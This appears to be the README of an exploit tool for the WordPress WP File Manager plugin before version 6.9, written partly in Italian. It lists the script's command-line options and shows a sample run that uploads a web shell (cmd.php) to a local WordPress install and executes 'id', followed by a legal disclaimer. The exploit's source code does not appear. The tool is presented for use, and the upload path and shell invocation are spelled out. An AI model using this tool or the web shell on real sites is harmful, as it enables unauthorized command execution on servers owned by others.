
wp-file-manager RCE
WP File Manager < 6.9 - Caricamento arbitrario di file che porta a RCE
usage: wp-file-manager.py [-h] [-u URL] [-f FILE]
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL URL of host to check will need http or https
-f FILE, --file FILE File of URLS to check
[+] Testing https://localhost [+]
[*]Shell Uploaded https://localhost/wp-content/plugins/wp-file-manager/lib/files/cmd.php?cmd=id[*]
Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
L'uso di questo strumento per attaccare target senza previo consenso reciproco è illegale. È responsabilità dell'utente finale rispettare tutte le leggi locali, statali e federali applicabili. Gli sviluppatori non si assumono alcuna responsabilità e non sono responsabili per eventuali usi impropri o danni causati da questo programma.